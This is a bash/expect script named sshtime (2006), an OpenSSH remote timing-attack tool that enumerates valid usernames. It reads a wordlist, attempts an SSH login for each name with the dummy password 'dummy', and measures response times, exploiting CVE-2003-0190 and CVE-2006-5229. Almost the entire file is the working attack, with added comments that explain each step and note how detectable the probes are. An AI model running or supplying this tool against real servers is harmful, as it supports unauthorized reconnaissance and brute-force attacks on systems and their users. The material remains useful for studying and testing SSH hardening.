#!/bin/bash

#
# $Id: sshtime,v 1.3 2006/10/11 15:32:31 raptor Exp $
#
# sshtime v0.1 - Simple OpenSSH remote timing attack tool
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# SSHtime is a shell script based on expect meant to remotely analyze timing 
# differences in sshd "Permission denied" replies. Depending on OpenSSH 
# version and configuration, it may lead to disclosure of valid usernames. 
#
# See also: 
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5229
#
# Usage example: 
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
# Some vars
# TCP port handed to "ssh -p" for every attempt.
port='22'

# Command line
# $1 = target host, $2 = wordlist file (one username per entry).
host="${1}"
dict="${2}"

# Local functions
# Print the tool banner (blank line, name/version, copyright, blank line) to stdout.
# Note: this function shadows head(1) for the rest of the script.
head() {
	printf '\n%s\n%s\n\n' \
		"sshtime v0.1 - Simple OpenSSH remote timing attack tool" \
		"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
}

# Print a trailing blank line and terminate the script with status 0.
foot() {
	printf '\n'
	exit 0
}
	
# Show the banner plus the command-line synopsis, then exit via foot (status 0).
usage() {
	head
	printf '%s\n\n%s\n%s\n' \
		"[make sure the target hostkey has been approved before]" \
		"usage  : ./sshtime <target> <wordlist>" \
		"example: ./sshtime 192.168.0.1 dict.txt"
	foot
}

# Report a missing expect interpreter after the banner, then exit via foot (status 0).
notfound() {
	head
	printf '%s\n' "error  : expect interpreter not found!"
	foot
}

# Check if expect is there
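# Check if expect is there.
# command -v is the POSIX way to resolve a command; which(1) is non-standard
# and its exit status is not reliable across implementations. The resolved
# path is stored in $expect and invoked later in the main loop.
if ! expect=$(command -v expect 2>/dev/null); then
	notfound
fi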

# Input control
# Input control: the wordlist argument ($2) is mandatory, so its absence
# (and therefore a missing host as well) falls through to usage.
[ -n "$2" ] || usage

# Perform the bruteforce attack
# Perform the bruteforce attack
# (head here is the banner function defined above, not head(1))
head

# One ssh attempt per wordlist entry.
# NOTE(review): `cat $dict` is unquoted, so the file is word-split on
# whitespace and glob-expanded; an entry containing spaces becomes several
# usernames.
for user in `cat $dict`
do
	# Label for this attempt, followed by two tabs and no newline, so the
	# timing value printed below lands on the same line.
	echo -ne "$user@$host\t\t"
	# time -p times an expect one-liner: log_user 0 silences the session
	# output, ssh is spawned (without echoing the command line) against
	# $host on $port as $user, and the loop answers any "password" prompt
	# with the literal string "dummy" until the connection closes (eof).
	# stderr is merged so time's report can be filtered down to its "real"
	# line. NOTE(review): presumably every iteration leaves a failed
	# authentication record on the target — verify when assessing
	# detectability of this probe.
	(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done

# Trailing blank line and exit 0.
foot